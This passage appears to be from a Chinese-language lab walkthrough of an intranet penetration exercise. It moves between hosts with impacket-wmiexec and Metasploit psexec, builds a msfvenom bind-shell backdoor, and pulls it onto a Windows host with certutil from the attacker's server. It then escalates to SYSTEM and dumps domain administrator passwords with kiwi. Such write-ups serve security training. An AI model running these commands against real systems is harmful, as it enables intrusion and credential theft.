proxychains impacket-wmiexec administrator@192.168.93.20 

image-20220905200208379

这样就拿下了

# msf 上线

因为拿到了明文密码,那尝试用 msf 的 psexec 模块

msf6 > search psexec

Matching Modules
================

   #   Name                                         Disclosure Date  Rank       Check  Description
   -   ----                                         ---------------  ----       -----  -----------
   0   auxiliary/scanner/smb/impacket/dcomexec      2018-03-19       normal     No     DCOM Exec
   1   exploit/windows/smb/ms17_010_psexec          2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2   auxiliary/admin/smb/ms17_010_command         2017-03-14       normal     No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3   auxiliary/scanner/smb/psexec_loggedin_users                   normal     No     Microsoft Windows Authenticated Logged In Users Enumeration
   4   exploit/windows/smb/psexec                   1999-01-01       manual     No     Microsoft Windows Authenticated User Code Execution
   5   auxiliary/admin/smb/psexec_ntdsgrab                           normal     No     PsExec NTDS.dit And SYSTEM Hive Download Utility
   6   exploit/windows/local/current_user_psexec    1999-01-01       excellent  No     PsExec via Current User Token
   7   encoder/x86/service                                           manual     No     Register Service
   8   auxiliary/scanner/smb/impacket/wmiexec       2018-03-19       normal     No     WMI Exec
   9   exploit/windows/smb/webexec                  2018-10-24       manual     No     WebExec Authenticated User Code Execution
   10  exploit/windows/local/wmi                    1999-01-01       excellent  No     Windows Management Instrumentation (WMI) Remote Command Execution


Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/local/wmi

msf6 > use 4
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set SMBUSER administrator
SMBUSER => administrator
msf6 exploit(windows/smb/psexec) > set SMBPASS 123qwe!ASD
SMBPASS => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > setg proxies socks:127.0.0.1:8989
proxies => socks:127.0.0.1:8989
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 exploit(windows/smb/psexec) > exploit 

上线不了,耻辱下播

换个思路,用 msf 生成后门上传到这个主机然后执行就行

msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=192.168.93.20 RPORT=5555 -f exe > exp.exe

web-centos 上用 python 起个 web 服务

python -m SimpleHTTPServer 8080 

windows 下载

certutil -urlcache -split -f http://192.168.93.100:8080/exp.exe c:\exp.exe

可以看到已经下载了

image-20220906114209463

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set RHOST 192.168.93.20

set RPORT 5555

exploit

成功上线

image-20220906110931630

# 信息收集

先升级为 system 权限

meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

image-20220906111208984

查看 ip

image-20220906111322895

# 查看系统进程

image-20220906111425400

看到有个 TEST/administrator,尝试能不能抓到密码

# load kiwi

image-20220906123643650

抓到域控管理员密码了

Administrator  TEST     zxcASDqw123!!
Administrator  WIN2008  123qwe!ASD

# win 2012

# wmiexec 上线

proxychains impacket-wmiexec test/Administrator@192.168.93.10 

密码
zxcASDqw123!!

# PC

# wmiexec 上线

proxychains impacket-wmiexec ./Administrator@192.168.93.30 

密码
123qwe!ASD

image-20220906125553837

请我喝[茶]~( ̄▽ ̄)~*

miku233 微信支付

微信支付

miku233 支付宝

支付宝

miku233 贝宝

贝宝